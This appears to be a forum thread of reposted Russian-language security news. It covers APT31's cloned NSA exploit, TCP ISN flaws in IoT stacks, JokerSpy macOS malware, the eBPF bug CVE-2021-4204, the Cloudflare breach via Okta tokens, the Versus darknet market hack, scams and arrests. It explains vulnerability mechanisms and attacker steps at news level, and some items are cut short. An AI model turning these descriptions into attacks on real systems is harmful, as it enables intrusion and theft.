Это не первый случай, когда злоумышленники используют инструменты Equation Group в своих атаках, однако первый случай, когда хакеры сумели каким-то образом заполучить образцы эксплоитов и клонировать их в своих целях. Исследователи вспоминают, что ранее группировка APT3 уже применяла собственную версию инструмента EternalSynergy (названную UPSynergy). Однако тогда ИБ- эксперты компании Symantec пришли к выводу, что хакеры воссоздали эксплоит из перехваченного сетевого трафика и не имели на руках исходников.
В свою очередь, APT31 каким-то образом смогла заполучить образцы эксплоита АНБ всех версий, так как Jian был собран с использованием 32-битной и 64-битной версий инструмента EpMe. В Check Point считают, что информация могла попасть в руки китайских хакеров несколькими способами:
«Наше исследование — это наглядная демонстрация того, как одна APT использует инструменты другой APT для собственных операций, что усложняет ИБ-исследователям задачу точной атрибуции атак, а также демонстрирует, насколько сложна реальность и как мало мы знаем», — резюмируют аналитики Check Point.
Click to expand...
Источник: xakep.ru/2021/02/24/jian-and-epme/
Новый этап реализации проекта Memoria компании Forescout выявил еще девять уязвимых стеков TCP/IP, на которые полагаются миллионы IoT-устройств. Новые находки, объединенные под именем Number:Jack, связаны с фундаментальным аспектом TCP — нумерацией передаваемых сегментов данных.
Согласно стандарту RFC 793, установка нового TCP-соединения предполагает создание и обмен значениями ISN (Initial Sequence Number) — начальными порядковыми номерами сегментов, гарантирующими доставку данных. Эти ISN по идее должны генерироваться случайным образом, чтобы уберечь передаваемые данные от манипуляций и подмены.
Практика показала, что из-за недочетов в реализации стека TCP/IP номера ISN зачастую получаются не совсем случайными, и злоумышленник может без особого труда их угадать и подменить, чтобы вызвать отказ в обслуживании, организовать перехват нешифрованного трафика, перенаправить жертву на вредоносный сайт или напрямую загрузить на ее компьютер зловреда.
О возможности атаки с предсказанием порядковых номеров ISN эксперты предупреждали еще в 90-х годах прошлого столетия, и такие уязвимости уже почти полностью истребили в Windows, Linux и других широко используемых ИТ- продуктах. К сожалению, в мире интернета вещей подобные бреши до сих пор нередки и часто передаются по наследству, позволяя злоумышленникам обойти аутентификацию и получить дополнительный доступ к атакуемой сети.
По этой причине эксперты Forescout решили запустить проект Memoria, предметом которого является исследование защищенности стеков TCP/IP, используемых в современных встраиваемых и IoT-устройствах. На первом этапе им удалось выявить 33 уязвимости в четырех широко используемых TCP/IP-библиотеках; те находки получили известность как Amnesia:33.
Для второго этапа Project Memoria исследователи расширили контрольную выборку, добавив еще несколько популярных стеков. Проверка различных реализаций генератора ISN на соответствие нормам дала следующие результаты:
CVE-2020-27213 в Nut/Net 5.1;
CVE-2020-27630 в uC/TCP-IP 3.6.0;
CVE-2020-27631 в CycloneTCP 1.9.6;
CVE-2020-27632 в NDKTCPIP 2.25;
CVE-2020-27633 в FNET 4.6.3;
CVE-2020-27634 в uIP 1.0, затрагивает Contiki-OS 3.0 и Contiki-NG 4.5;
CVE-2020-27635 в PicoTCP 1.7.0 и PicoTCP-NG.Click to expand...
Все найденные уязвимости оценены в 7,5 балла по шкале CVSS. Вендоры и кураторы проектов поставлены в известность и уже приняли соответствующие меры — кроме одного. Разработчики uIP никак не отреагировали на уведомление от Forescout, так что их планы неизвестны.
Устройства, использующие названные TCP/IP-стеки, эксперты выявлять не стали, чтобы не давать подсказку злоумышленникам. Они только отметили, что такие подробности могли быть опубликованы для некоторых медицинских аппаратов, систем мониторинга работы газотурбинных установок и систем хранения данных.
• Source: [https://www.forescout.com/company/b...ation-vulnerabilities- affecting-tcpip-stacks/](https://www.forescout.com/company/blog/numberjack- forescout-research-labs-finds-nine-isn-generation-vulnerabilities-affecting- tcpip-stacks/)
• Source: 96 год http://rfc.com.ru/rfc1948.htm
В ходе операции по борьбе с киберпреступностью в Таиланде арестовали более 14 тысяч человек, а также заморозили активы на сумму 4,5 миллиарда батов
В результате масштабной специальной операции по борьбе с киберпреступностью, проводимой Королевской полицией Таиланда в последние семь месяцев, достигнуты значительные успехи в борьбе с онлайн-мошенничеством, сообщает Национальное бюро новостей Таиланда.
Усилия правоохранительных органов привели к задержанию более 14 тысяч человек, связанных с мошенническими колл-центрами или вовлеченных в мошеннические схемы, инвестиционное мошенничество и нелегальные операции онлайн-гемблинга.
Власти успешно заморозили активы на сумму 4,5 миллиарда батов, связанные с преступной деятельностью. В настоящее время ведутся переговоры с Управлением по борьбе с отмыванием денег о возвращении средств жертвам мошенничества.
Министерство цифровой экономики и общества (МЦЭиО) также активизирует усилия по борьбе с киберпреступностью. В прошлом месяце министерство сообщило о блокировке доступа к сайтам азартных игр и отключении миллионов подозрительных мобильных номеров.
Принимаемые меры отражают решимость МЦЭиО защищать цифровое пространство и граждан от киберугроз. Министерство создало центральный координационный центр и сотрудничает с различными ведомствами для противодействия онлайн-угрозам.
Кроме того, Министерство работает над проектами вторичных законов в рамках Декрета о цифровых платформах для регулирования онлайн-платформ и защиты прав пользователей. Инициативы направлены на создание более безопасной и защищенной цифровой среды.
В рамках развития технологий облачных вычислений и искусственного интеллекта МЦЭиО наладило партнерство с Huawei Cloud Thailand, облачным сервисом от Huawei для хранения практически любых типов данных. Сотрудничество нацелено на трансформацию цифровой экономики Таиланда и укрепление возможностей в области кибербезопасности.
Масштабная операция против онлайн-мошенничества и усилия МЦЭиО демонстрируют серьезный подход Таиланда к борьбе с киберпреступностью. Власти страны стремятся создать безопасное цифровое пространство для граждан и бизнеса, одновременно возвращая похищенные средства жертвам мошенничества.
Принимаемые инициативы — важный шаг на пути к построению надежной и процветающей цифровой экономики в Таиланде.
Кампания, получившая название «Вместе против киберугроз», запущена начальником национальной полиции Таиланда генералом Дамронгсаком Киттипрапасом. Основная цель — повысить осведомленность общественности о киберугрозах и призвать пользователей интернета с осторожностью относиться к онлайн-активности.
По статистике, Таиланд ежедневно сталкивается примерно с 800 киберпреступлениями, что приводит к значительным финансовым потерям. С 1 марта 2022 года по 30 июня 2023 года в стране зарегистрировано 287 122 уголовных дела, связанных с киберпреступностью, а общий ущерб составил почти 40 миллиардов батов.
Многие из мошеннических схем исходят из-за пределов Таиланда, где иностранные преступные группировки нацелены на тайских пользователей из таких стран, как Камбоджа и Мьянма. Для решения проблемы онлайн-безопасности ЮНИСЕФ и правительство Таиланда запустили кампанию, призывающую детей и подростков дважды подумать, прежде чем делиться личной информацией в интернете.
Кроме того, в марте 2023 года в Таиланде вступил в силу Королевский указ о мерах по защите и пресечению технологических преступлений, который призывает банки и поставщиков услуг оказывать помощь в борьбе с киберпреступностью и мошенничеством.
Таиланд демонстрирует серьезный подход к решению проблемы киберпреступности, объединяя усилия правоохранительных органов, государственных учреждений и международных организаций. Масштабные операции, законодательные инициативы и информационные кампании направлены на создание более безопасной цифровой среды в стране.
• Source: PATTAYAPEOPLE.RU Опубликовано 10.06.2024
По информации [Elastic Security Labs](https://www.elastic.co/security- labs/inital-research-of-jokerspy), в начале текущего месяца неназванная криптовалютная биржа в Японии стала жертвой новой macOS-малвари под названием JokerSpy. Исследователи говорят, что атака привела к установке enumeration- инструмента Swiftbelt.
JokerSpy был обнаружен специалистами Bitdefender в июне 2023 года. Тогда эксперты писали о наборе вредоносных артефактов, которые, по их словам, являются частью сложного кроссплатформенного инструментария, в том числе нацеленного на устройства, работающие под управлением macOS.
Как теперь сообщают аналитики Elastic Security Labs, им удалось выявить первые атаки с использованием JokerSpy, от которых пострадал крупный провайдер криптовалютных услуг в Японии, специализирующийся на обмене активов для торговли Bitcoin, Ethereum и другими распространенными криптовалютами. Название компании не разглашается.
Эксперты отслеживают эту кампанию под идентификатором REF9134 и говорят, что атака привела к установке enumeration-инструмента Swiftbelt, основанного на Swift и явно вдохновленного опенсорсной утилитой SeatBelt.

О злоумышленниках, стоящих за этими атаками, пока известно мало, за исключением того факта, что они используют набор программ, написанных на Python и Swift, которые обладают возможности для сбора данных и выполнения произвольных команд на скомпрометированных хостах.
Основным компонентом этого инструментария является кастомный мультиархитектурный бинраник xcc, который разработан для проверки разрешений FullDiskAccess и ScreenRecording, что обычно происходит перед использованием шпионской малвари. Отмечается, что файл подписан как XProtectCheck, а это указывает на попытку хакеров замаскироваться под XProtect — встроенный антивирусный механизм в macOS.
В инциденте, который изучили аналитики Elastic Security Labs, за созданием xcc последовали попытки обхода разрешений TCC (Transparency, Consent, and Control) и создания собственной [базы TCC](https://support.apple.com/en- us/guide/security/secddd1d86a6/web), чтобы заменить существующую.
Бинарник xcc, в свою очередь, запускается с помощью Bash через три различных приложения: IntelliJ IDEA, iTerm и Visual Studio Code. По мнению аналитиков, это указывает на то, что для получения первоначального доступа, скорее всего, использовались вредоносные версии приложений для разработки ПО.
Еще один модуль, который устанавливается в рамках этих атак, это sh.py, написанный на Python. Он используется в качестве канала для доставки других инструментов для пост-эксплуатации, включая упомянутый Swiftbelt.
В подсистеме eBPF, позволяющей запускать обработчики внутри ядра Linux в специальной виртуальной машине с JIT, выявлена уязвимость ([CVE-2021-4204](https://security- tracker.debian.org/tracker/CVE-2021-4204)), дающая возможность локальному непривилегированному пользователю добиться повышения привилегий и выполнения своего кода на уровне ядра Linux. Проблема проявляется начиная с ядра Linux 5.8 и пока остаётся неисправленной (затрагивает в том числе выпуск 5.16).
Заявлено о создании рабочего эксплоита, который планируют опубликовать 18 января (пользователям и разработчикам дана неделя на устранение уязвимости).
Уязвимость вызвана некорректной проверкой передаваемых для выполнения eBPF- программ. Подсистема eBPF предоставляет вспомогательные функции, корректность использования которых проверяет специальный верификатор. Некоторые функции требуют передачи значения PTR_TO_MEM в качестве аргумента и для предотвращения возможных переполнений буфера верификатор должен знать размер связанной с аргументом памяти. Для функций bpf_ringbuf_submit и bpf_ringbuf_discard данные о размере передаваемой памяти не сообщались верификатору, что могло использоваться для перезаписи областей памяти за границей буфера при выполнении специально оформленного eBPF-кода.
Для проведения атаки пользователь должен иметь возможность загрузки своей BPF- программы, а многие свежие дистрибутивы Linux по умолчанию блокируют такую возможность (в том числе непривилегрированный доступ к eBPF теперь запрещён по умолчанию и в самом ядре, начиная с выпуска 5.16). Например, уязвимость может быть эксплуатирована в конфигурации по умолчанию в Ubuntu 20.04 LTS, но в окружениях Ubuntu 22.04-dev, Debian 11, openSUSE 15.3, RHEL 8.5, SUSE 15-SP4 и Fedora 33 проявляется только если администратор выставил параметр kernel.unprivileged_bpf_disabled в значение 0. В качестве обходного пути блокирования уязвимости можно запретить выполнение BPF-программ непривилегированным пользователям командой "sysctl -w kernel.unprivileged_bpf_disabled=1".
The researchers also discovered that botnets and attackers behind malware and phishing email attacks are relying on "fast-churning campaigns" where the same template will hit an average of no more than 1,000 potential victims.
Сотрудниками МВД России и ФСБ России в следственные органы доставлены 12 местных жителей. Они могут быть причастны к организации неправомерного доступа к охраняемой законом компьютерной информации о передвижении железнодорожных составов по территории Российской Федерации.
«Предварительно установлено, что злоумышленники занимались криминальным бизнесом с 2020 года. Организатором стал бывший сотрудник информационно- вычислительного центра крупной железнодорожной компании. Он вступил в сговор со своими бывшими и действующими коллегами.
Фигуранты организовали несанкционированное подключение к терминалу, на который в реальном времени поступала информация о расписании и маршрутах движения грузовых поездов. Заинтересованным физическим и юридическим лицам предлагалось приобрести эти сведения», – рассказала официальный представитель МВД России Ирина Волк.
Для легализации противоправной деятельности ее участники создали коммерческую организацию. Она декларировала своей деятельностью использование баз данных и информационных ресурсов. От имени этой фирмы с участниками процесса грузоперевозок заключались договоры на оказание услуг.
«По оперативным данным, компания имела несколько десятков постоянных заказчиков, каждый из которых ежемесячно платил за доступ к информации от 500 тысяч до одного миллиона рублей. Общий доход организации за время ее существования составил порядка 100 млн рублей.
При этом доступ к сведениям о перевозках грузов по территории России предоставлялся в том числе зарубежным клиентам, что могло угрожать транспортной безопасности и привести к разглашению стратегически важной информации», – сообщила Ирина Волк.
В ходе обысков в жилых и офисных помещениях полицейские совместно с сотрудниками регионального УФСБ России и ГСУ СК России по г. Санкт-Петербургу при поддержке Росгвардии изъяли компьютерную технику, носители информации, средства связи, документы и другие предметы, имеющие доказательственное значение.
«Возбуждено уголовное дело по признакам преступления, предусмотренного статьей 272 УК РФ. Восьми фигурантам избрана мера процессуального принуждения в виде обязательства о явке, четверо задержаны на основании статьи 91 УПК РФ», – добавила Ирина Волк.
• Video: https://rutube.ru/video/f4753d44410c0ba1995aaafe28e3fbc4/?r=plemwd
Компания Cloudflare, предоставляющая сеть доставки контента, обслуживающую примерно 20% интернет-трафика, опубликовала отчёт о взломе одного из серверов в своей инфраструктуре, на котором функционировал внутренний wiki-сайт на базе платформы Atlassian Confluence, система отслеживания ошибок Atlassian Jira и система управления кодом Bitbucket. Разбор показал, что атакующий смог получить доступ к серверу, воспользовавшись токенами, полученными в результате [октябрьского взлома](http://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta- compromise) компании Okta, приведшего к утечке токенов доступа.
После раскрытия осенью информации о взломе Okta, компания Cloudflare инициировала процесс обновлений используемых через сервисы Okta учётных данных, ключей и токенов, но как оказалось один токен и три учётных записи (из нескольких тысяч), скомпрометированные в результате взлома Okta, не были заменены и продолжали действовать, чем и воспользовался атакующий. Указанные учётные данные считались неиспользуемыми, но на деле позволяли получить доступ к платформе Atlassian, системе управления кодом Bitbucket, SaaS-приложению, имеющему административный доступ к окружению Atlassian Jira, и окружению в AWS, обслуживающему каталог Cloudflare Apps, но не имеющему доступ к инфраструктуре CDN и не хранящему конфиденциальных данных.
Инцидент не затронул данные и системы пользователей Cloudflare. Проведённый аудит определил, что атака ограничилась системами с продуктами Atlassian и не распространилась на другие серверы, благодаря применению в Cloudflare модели с нулевым доверием (Zero Trust) и изоляции частей инфраструктуры.
Взлом сервера Cloudflare был выявлен 23 ноября, а первые следы несанкционированного доступа к wiki и системе отслеживания ошибок зафиксированы 14 ноября. 22 ноября атакующим был установлен бэкдор для получения постоянного доступа, созданный при помощи ScriptRunner для Jira. В тот же день атакующий получил доступ к системе управления исходными текстами, в которой использовалась платформа Atlassian Bitbucket. После этого была предпринята подключения к консольному серверу, используемому для доступа к ещё не введённому в строй датацентру в Бразилии, но все попытки подключения оказались неудачными.
Судя по всему активность атакующего ограничилась изучением архитектуры сети доставки контента и поиском слабых мест. В ходе своей деятельности атакующий использовал поиск в wiki по ключевым словам, связанным с удалённым доступом, секретами, openconnect, cloudflared и токенами. Зафиксировано открытие злоумышленником 202 wiki-страниц (из 194100) и 36 отчётов о проблемах (из 2059357), связанных с управления устранением уязвимостей и ротацией ключей. Также выявлена загрузка 120 репозиториев с кодом (из 11904), большинство из которых связаны с резервным копированием, настройкой и управлением CDN, системами идентификации, удалённым доступом и использованием платформ Terraform и Kubernetes. В некоторых из репозиториев присутствовали оставленные в коде зашифрованные ключи, которые были заменены сразу после инцидента, несмотря на использование надёжных методов шифрования.
Barracuda Network выясняет, как сотня хакеров элиты ведут войну против вашего кошелька.
Эксперты по кибербезопасности предположили , что почти за всеми
вымогательствами в интернете стоит совсем небольшое количество «элитных»
хакеров — около сотни человек.
Вывод сделали на основе исследования, проведенного компанией Barracuda Network
совместно со специалистами Колумбийского университета. Было изучено более 300
тысяч электронных писем с вымогательствами, а также адреса криптовалютных
кошельков, на которые злоумышленники получали выкуп.
Выяснилось, что 80% всех писем связаны с сотней одних и тех же почтовых
адресов. Это означает, что за ними стоит небольшая группа хакеров, возможно
связанных между собой. Чаще всего требуют небольшие суммы — менее 2 тысяч
долларов. Вероятно, с расчетом на то, что жертвы не будут обращаться в полицию
и не привлекут внимание банков и налоговых служб. Для получения выкупа
используют только биткоин. Криптовалюта обеспечивает мошенникам высокий
уровень анонимности.
Исследователи также проанализировали поле «отправитель» в каждом письме. Таким
образом можно посчитать, сколько посланий было отправлено с одного адреса.
Затем информацию соотнесли с количеством уникальных биткоин-адресов,
использованных определенными хакерами. Для наглядности анализа эксперты
Barracuda построили графики, разбив их по количеству писем от одного
отправителя.
Обнаружилось, что один и тот же отправитель может использовать разные адреса
криптокошельков в своих письмах. Должно быть, это способ затруднить
отслеживание денежных потоков.
Эксперты считают, что противостоять интернет-мошенникам теперь должно быть
довольно просто. Если правоохранительные органы смогут выйти на след хотя бы
небольшого числа хакеров, это уже будет большим прогрессом. Во-вторых,
поскольку хакеры-вымогатели копируют действия друг друга и следуют похожим
шаблонам, поставщики услуг по защите электронной почты смогут блокировать
большую часть этих атак с помощью простых детекторов. Например, Barracuda
Sentinel или Barracuda Forensics and Incident Response могут помочь обнаружить
и остановить такие атаки.
Закон вступает в силу с 1 января 2024 года.
Президент РФ Владимир Путин подписал закон, который предусматривает введение оборотных штрафов для операторов связи за отказ устанавливать средства оперативно-розыскных мероприятий (СОРМ). Документ опубликован на официальном сайте.
Как уточнили законодатели, административная ответственность устанавливается за несоблюдение обязательных лицензионных требований, предъявляемых к сетям и средствам связи для обеспечения безопасности и проведения оперативно-розыскных мероприятий.
Неисполнение оператором связи обязанности обеспечивать реализацию СОРМ повлечёт:
наложение штрафа на индивидуальных предпринимателей и юрлиц от 0,001% до
0,003% размера суммы выручки, но не менее одного миллиона рублей;
повторно — от 0,01% до 0,03% размера суммы выручки, но не менее одного
миллиона рублей.
Важно отметить, что размер выручки определяется на рынке оказания услуг связи в соответствующем субъекте РФ, где было выявлено нарушение.
В сопроводительной документации к законопроекту говорилось , что установка СОРМ обусловлена необходимостью обеспечения безопасности граждан и государства, борьбы с мошенничеством, связанным с использованием телефонных звонков с подменой номера вызывающего абонента, а также предотвращением распространения заведомо ложных сообщений об угрозах террористических актов.
В Минцифры ранее утверждали, что новые штрафы для операторов связи не окажут влияния на тарифы для потребителей.
Закон вступает в силу с 1 января 2024 года.
Компания Life at Sea Cruises пол года назад открыла бронирование на трехлетнее кругосветное путешествие для айтишников, фрилансеров и удаленщиков.
Стоимость такого круиза ол-инклюзив составляла 2,3 млн. рублей в год, почти 6 млн. за все 3 года, которые нужно было внести как предоплату.
Круиз должен был начаться 1 ноября 2023 года, но стали известны неожиданные подробности:
— Корабль не отремонтировали;
— дочерние компании-организаторы разорвали контракты;
— дата отправления может быть изменена.
Красивая мечта айтишников работать удаленно 3 года в путешествии буквально разрушается на глазах. Одна женщина даже продала дом, чтобы купить круиз, но сейчас пытается вернуть деньги.
Произошла современная интерпретация МММ, айтишники в роли жертвы.
Новая программа прямого ввода в эксплуатацию поможет белым хакерам заменить классическую службу в армии на привычные операции в киберпространстве.
Военно-воздушные силы (ВВС) США пересмотрели методы набора и ввода в строй следующего поколения киберпрофессионалов. Теперь ВВС будут использовать новую «программу прямого ввода в эксплуатацию Cyber», чтобы удовлетворить текущие потребности в военной киберсфере.
Использование новой программы позволит ВВС быстрее развивать критически важные технические навыки у солдат, необходимые для выполнения различных кибермиссий на протяжении всей их службы. Эта программа сократит цикл обучения офицеров и ускорит процесс их адаптации для выполнения срочных миссий, а также подготовит их к более сложным миссиям в будущем.
«Мы хотим использовать программу прямого ввода в эксплуатацию Cyber (CDCP), чтобы задействовать резервы талантов, к которым у нас ранее не было эффективного доступа. Цель состоит в том, чтобы создать заманчивую возможность для людей, которые хотели бы как-то иначе служить своей стране, устранить ненужные барьеры, которые могли бы отвратить их от службы, и ускорить отбор тех, кто получает офицерские звания и оплату, соответствующие их реальному уровню опыта», — заявила генерал-лейтенант Лия Лодербэк, заместитель начальника штаба по разведке, наблюдению и рекогносцировке ВВС США.
Программа CDCP предназначена для привлечения к службе в кибервойсках талантливых людей за пределами традиционного военного аппарата. В рамках этой инициативы отбираются высококвалифицированные эксперты в предметной области для заполнения званий от лейтенанта до полковника для удовлетворения текущих потребностей военной службы.
Цель CDCP — привлечь людей с опытом гражданской работы, связанной с киберпространством, и даже с учёными степенями. Кандидаты должны соответствовать базовым требованиям к кандидатам на должность офицера и обладать продемонстрированными знаниями в области кибербезопасности или киберопераций, полученными в том числе благодаря высоким академическим степеням, соответствующему отраслевому опыту или профессиональным сертификациям.
«Мы ищем лучших специалистов по всей Америке, которые могли бы присоединиться к нашим военно-воздушным силам в качестве офицеров киберпространства», — сказал генерал-майор Терренс Адамс, директор по операциям в киберпространстве и боевым коммуникациям.
Интересно, планирует ли правительство РФ в будущем внедрить что-то подобное, чтобы каждый талантливый IT-специалист с продвинутыми навыками в области кибербезопасности мог пройти альтернативную службу в армии, помогая родине из комфортного тёплого офиса.
source: af.mil/News/Article-Display/Article/3368057/cyber-direct- commissioning-program-enhancement-to-onboard-future-cyber-officers
Появившаяся на свет в августе 2019 в даркнете торговая площадка Versus
постепенно обрастала клиентурой. Ее росту во многом способствовал уход с рынка
многих крупных даркнет-маркетов в 2020-2021 годах. В обзорах, посвященных
Versus, отмечалось, что администрация делает особый упор на безопасность. Так
вот, это оказалось полной ерундой. Сервер площадки удалось взломать с помощью
незатейливого эксплойта.
События развивались следующим образом.
На связь с DeSnake, админом площадки AlphaBay, вышел хакер threesixty, который сообщил о серьезных проблемах с безопасностью у маркета Versus. По началу DeSnake скептически отнесся к этой информации, но решил взглянуть на профиль отправителя на Dread и обнаружил, что он немногим ранее разместил пост субдреде Versus, где попытался начать разговор о проблемах этой площадки. К сожалению, пост не привлек должного внимания аудитории.
DeSnake связался с хакером и в ответ получил от него “интересную информацию”, которую админ AplhaBay решил проверить сам, чтобы убедится в ее достоверности. Он был уверен, что администрация Versus уже пропатчила систему, но с удивлением обнаружил, что даже после поста threesixty никаких мер по исправлению печальной ситуации с безопасностью предпринято не было. Уязвимость, позволяющая получить доступ к файловой системе сервера и установить контроль над ним, по прежнему присутствовала. DeSnake в паре с “добрым” хакером threesixty провели собственный аудит безопасности и собрали еще больше доказательств того, что им удалось добраться до настоящего сервера Versus.
“Обнаружить уязвимость было весьма легко, для этого необходимо было провести лишь хрестоматийное тестирование. Почему за три года никто так и не сообщил о ней и не устранил ее, нам совершенно не понятно. Уязвимость позволяет захватить полный контроль над сервером. База данных, файлы, номера криптокошельков, IP адреса – все попадает к злоумышленникам. Абсолютный PWN”.
DeSnake и threesixty выгрузили часть информации, чтобы предоставить доказательства наличия серьезной дыры в безопасности Versus вышестоящему начальству в лице админа форума Dread с ником Paris. По их мнению, Versus может прекратить свое функционирование в любой момент.
Они также пожаловались на серьезные проблемы с персоналом маркетплейса.
В своем сообщении на форуме Paris подтвердил, что на сервере действительно был размещен весьма простой, но эффективный эксплойт. С его помощью можно получить доступ к системным файлам, информации в директории etc и директориям с криптокошельками, бэкапу базы данных в папке администратора и логу с IP адресами, с которых заходили на сервер. Paris был весьма неприятно удивлен, тем что на сервере не были внедрены даже базовые параметры меры безопасности, такие как тюрьма для нарушителей и файервол.
“Это был полный взлом и его можно было легко найти и ликвидировать. Даже полный “чайник”, который занимается тестированием безопасности, мог его обнаружить”.
Click to expand...
От своего имени Paris порекомендовал не иметь дел с Versus.
“Сервер, возможно, скомпрометирован правоохранительными органами и находится под наблюдением. Это полная компрометация и, без сомнения, один из худших результатов, к которому привел простой экплойт”.
Click to expand...
По данным «Лаборатории Касперского», в четвертом квартале 2020 года число DDoS-атак выросло на 10% по сравнению с аналогичным периодом 2019 года, но при этом снизилось на 31% по сравнению с третьим кварталом 2020 года. То есть спад рынка, наметившийся еще прошлой весной, по-прежнему продолжается.
Исследователи считают, что на снижение числа DDoS-атак в конце 2020 года мог повлиять бурный рост рынка криптовалюты. Так, операторы многих ботнетов, похоже, перенаправили часть мощностей на майнинг, чтобы зараженные устройства приносили прибыль. Это предположение подтверждается статистикой Kaspersky Security Network. На протяжении 2019 года и в начале 2020 года число криптомайнеров падало, но с августа 2020 года начало резко расти, а в четвертом квартале вышло на плато.

Спад произошел за счет атак, легких в организации, тогда как доля «умных» DDoS-атак снизилась незначительно. Причина этого, вероятно, заключается в том, что при росте цен на подобные услуги первыми отсекаются дилетанты — школьники, мелкие хулиганы и просто горячие головы, у которых нет серьезных причин для заказа DDoS. Интересы же профессионалов не теряют актуальности, особенно в богатый на праздники и распродажи четвертый квартал, поэтому они продолжают заказывать и организовывать атаки.
Кроме того, с октября по декабрь 2020 года по-прежнему фиксировались инциденты с ресурсами образовательных организаций. Об этом, в частности, сообщили несколько школ в Массачусетсе и Лаврентийский университет в Канаде. Также от мусорного трафика в заключительном квартале года страдали популярные игровые платформы.
Кстати, самым активным днем квартала с точки зрения DDoS стало 31 декабря 2020 года, когда было зафиксировано 1349 атак за одни сутки.
«На развитие рынка DDoS-атак сегодня влияют два противоположных тренда. С одной стороны, этот инструмент остается востребованным у злоумышленников: от того, насколько стабильно работают онлайн-ресурсы, зависят многие важные процессы, в том числе деловые и учебные. В то же время рост стоимости криптовалют делает более выгодными атаки майнеров. Поскольку текущие колебания связаны в основном с динамикой цен на криптовалюты, мы не ожидаем взрывного роста или падения рынка DDoS в ближайшем будущем», — комментирует Алексей Киселев, менеджер проекта Kaspersky DDoS Protection.
Click to expand...
Источник: xakep.ru/2021/02/17/ddos-and-mining/
«Сотрудники НЦБ Интерпола МВД России совместно с оперативниками ГУУP МВД России и ГУ МВД России по г. Москве на территории столицы задержали гражданина Турецкой Республики Янара Рамазана. Он находился в международном розыске с декабря 2015 года по обвинению в подделке официальных документов, а также неправомерном использовании банковских карт», - сообщила официальный представитель МВД России Ирина Волк.
По информации турецкой стороны, работавший в ресторане злоумышленник запоминал реквизиты кредитных и дебетовых карт посетителей, после чего использовал их для покупки товаров через Интернет. Кроме того, он подделал удостоверение личности, вклеив собственную фотографию в документ другого человека.
«B настоящее время решается вопрос o выдаче задержанного правоохранительным органам Турецкой Республики», - уточнила Ирина Волк.
Эксперты «Лаборатории Касперского» [рассказали](https://www.kaspersky.ru/about/press-releases/2024_laboratoriya- kasperskogo-preduprezhdaet-o-moshennicheskoj-sheme-po-zarabotku-na- kriptovalyute-ton-v-telegram) об актуальной мошеннической схеме, связанной с криптовалютой Toncoin (TON) через Telegram. Эта схема работает по принципу финансовой пирамиды. Потенциальной жертве предлагают вложить деньги в TON. Далее жертва должна пригласить в специальный чат в мессенджере своих знакомых и получать за это комиссию. Для вовлечения людей мошенники подготовили видеоинструкцию (на русском и английском языках) и текстовые материалы со скриншотами.
По этой инструкции, пользователь должен завести специальный криптокошелёк через неофициальный бот для хранения криптовалюты в Telegram. Далее пользователь будет пользоваться отдельным Telegram‑ботом, который якобы сможет зарабатывать. В этот бот надо ввести адрес своего кошелька. Далее требуется купить криптовалюту минимум на 5,5 TON и перевести её на свой криптокошелёк. Для покупки предлагается использовать легитимные инструменты: P2P‑маркеты, криптообменники или официальный бот в Telegram. После всех озвученных действий надо активировать тот самый отдельный Telegram‑бот для заработка, выбрав один из платных «тарифов‑ускорителей». Стоимость тарифов варьируется от 5 до 500 TON. Как и в случае с пирамидами, организаторы схемы уверяют, что чем дороже тариф, тем быстрее человек начнёт «зарабатывать».
После выбора тарифа пользователь должен создать закрытую группу в Telegram и пригласить туда знакомых. Мошенники просят разместить в группе два видео, представляющие собой презентацию сервиса и инструкцию по активации. Кроме видео, надо разместить реферальные ссылки для регистрации криптокошелька и установки Telegram‑бота для «заработка». Злоумышленники настаивают, чтобы «криптоинвестор», прежде чем добавлять в группу нового человека, позвонил ему лично и рассказывал о преимуществах сервиса. Чтобы пользователь мог получать комиссию за приглашение знакомых, надо активировать бот и якобы инвестировать в криптовалюту должны минимум пять человек.
По уверениям организаторов, заработок будет складываться из двух частей: фиксированной платы в 25 TON за каждого приглашённого друга и комиссии за выбранный, купленный приглашёнными знакомые по реферальным ссылкам.
Ольга Свистунова
старший контент-аналитик «Лаборатории Касперского»«Злоумышленники реализуют множество фишинговых и скам‑схем, нацеленных на людей, интересующихся заработком на цифровых активах. Только в первом квартале наши решения предотвратили более 430 тысяч попыток перехода пользователей в России на фальшивые ресурсы по теме криптовалют. Особенность описанной схемы заключается в том, что она строится по принципу „пирамиды“, пользователей побуждают вовлекать в неё друзей и знакомых. За счёт этого злоумышленникам легче искать новых жертв — пользователи сами советуют их сервис, а личная рекомендация вызывает больше доверия».
Click to expand...
Гражданин России Олег Пацуля, задержанный в штате Аризона по обвинениям в сговоре с целью обхода экспортных ограничений и транснациональном отмывании денежных средств, не признал вину, следует из материалов Федерального окружного суда Аризоны.
Обвинения россиянину были предъявлены 31 мая в ходе судебного заседания, на котором его юридическим представителем выступила государственный федеральный защитник Аризоны Шале Бразиэль. Пацуля отказался признать вину по всем пунктам обвинения.
Тем не менее, по настоянию прокуратуры, заявившей о высоком риске уклонения от правосудия со стороны обвиняемого, суд постановил оставить гражданина РФ под стражей до слушаний по существу дела.
Подача заявлений сторон должна быть осуществлена в срок до 12 июня, разбирательство с участием присяжных запланировано на 6 июля 2023 года, указывается в деле 2:23-cr-00770, с которым ознакомилось РАПСИ.
Сообщником Пацули по указанному делу выступает еще один гражданин РФ — Василий Беседин.
По версии прокуратуры США оба россиянина, проживающие во Флориде, использовали, с вовлечением иных лиц, свою зарегистрированную в этом штате компанию MIC P&I, LLC для поставок запасных частей самолетов компаниям из РФ в нарушение регулирующего экспортные операции законодательства США.
Следствие полагает, что обвиняемые получали заказы напрямую от российских авиакомпаний, включая те из них, в отношении которых уже были ужесточены экспортные правила из-за специальной операции на Украине. При этом для сокрытия конечных получателей деталей самолетов и источников платежей Пацуля и Беседин якобы задействовали фирмы-посредники и банковские счета в третьих странах.
Используя указанные выше методы, обвиняемые, как утверждает прокуратура, обращались к поставщикам запасных частей, вводя их в заблуждение относительно национальной принадлежности конечных получателей. Так, указывает Министерство юстиции США, в сентябре 2022 года россияне совершили поездку в Аризону в попытке приобретения оборудования для тормозных систем самолетов у местной компании.
В случае признания Пацули и Беседина виновными, им грозит наказание в виде тюремного заключения на срок до 20 лет за нарушение экспортного законодательства и до 20 лет заключения за сговор в целях осуществления транснационального отмывания денежных средств, отмечается в сообщении.
Задержание россиян стало результатом деятельности недавно учрежденной правоохранительной структуры «Ударная группа по прорывным технологиям» (Disruptive Technology Strike Group), отмечает Минюст США.
Среди удачных, по мнению Министерства юстиции, операций новой структуры,
заявляется задержание гражданина Греции Николаоса Богониколоса, якобы
